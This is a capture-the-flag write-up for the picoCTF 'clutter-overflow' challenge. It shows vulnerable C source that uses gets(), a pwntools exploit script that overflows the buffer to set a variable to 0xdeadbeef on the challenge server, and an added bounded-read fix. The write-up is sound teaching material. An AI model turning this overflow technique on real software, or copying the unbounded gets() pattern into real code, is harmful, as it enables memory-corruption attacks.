Binary Exploitation

{"authors": ["ret2basic"]}

clutter-overflow

Solved by ret2basic

Challenge

Clutter, clutter everywhere and not a byte to use.

nc mars.picoctf.net 31890

chall.c chall

Recon

Source Code

#include <stdio.h>
#include <stdlib.h>

#define SIZE 0x100
#define GOAL 0xdeadbeef

int main(void)
{
  long code = 0;
  char clutter[SIZE];

  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  puts(HEADER); 
  puts("My room is so cluttered...");
  puts("What do you see?");

  gets(clutter);


  if (code == GOAL) {
    printf("code == 0x%llx: how did that happen??\n", GOAL);
    puts("take a flag for your troubles");
    system("cat flag.txt");
  } else {
    printf("code == 0x%llx\n", code);
    printf("code != 0x%llx :(\n", GOAL);
  }

  return 0;
}

Solution

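gets(clutter) reads a line with no length limit, so input longer than the 0x100-byte clutter buffer keeps writing past its end and into code. Overwrite the code variable with 0xdeadbeef.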

Exploit

#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch='amd64', os='linux')
elf = ELF("./chall", checksec=False)

host = 'mars.picoctf.net'
port = 31890

#--------Overwrite variable--------#

# Padding bytes between the start of clutter and code (0x108)
offset = 0x110 - 0x8

payload = flat(
    b"A" * offset,
    0xdeadbeef,
)

r = remote(host, port)

# Use a bytes delimiter: pwntools under Python 3 expects bytes, not str
r.sendlineafter(b'What do you see?\n', payload)

r.interactive()
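
The root cause is the unbounded gets(clutter) call in chall.c. As an added example (not part of the original writeup or the challenge source), the bounded read below takes the same kind of over-long line and leaves code untouched. The names read_line, struct frame and code_after_input are hypothetical, and the struct layout is an assumption that places code directly after clutter.

```c
#include <stdio.h>
#include <string.h>

#define SIZE 0x100
#define GOAL 0xdeadbeef

/* Constructed layout (assumption): `code` directly follows `clutter`. */
struct frame { char clutter[SIZE]; long code; };

/* Bounded replacement for gets(): stores at most size-1 bytes plus NUL, strips
   the newline and discards the rest of an over-long line.
   Returns 0 if the line fit, 1 if it was truncated, -1 on EOF or error. */
int read_line(FILE *in, char *buf, size_t size)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }
    int c, truncated = 0;            /* no newline stored: drain the line */
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated;
}

/* Feeds a constructed line (n filler bytes, then the GOAL bytes) through
   read_line() and returns the value of `code` afterwards. */
long code_after_input(size_t n, int *status)
{
    struct frame f = { .code = 0 };
    unsigned int goal = GOAL;
    FILE *in = tmpfile();            /* stands in for stdin */
    if (in == NULL) { *status = -1; return -1; }
    for (size_t i = 0; i < n; i++)
        fputc('A', in);
    fwrite(&goal, sizeof goal, 1, in);
    fputc('\n', in);
    rewind(in);
    *status = read_line(in, f.clutter, sizeof f.clutter);
    fclose(in);
    return f.code;
}

int main(void)
{
    int st;
    long code = code_after_input(0x108, &st);
    printf("status=%d code=0x%lx\n", st, (unsigned long)code);
    return code == 0 ? 0 : 1;
}
```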
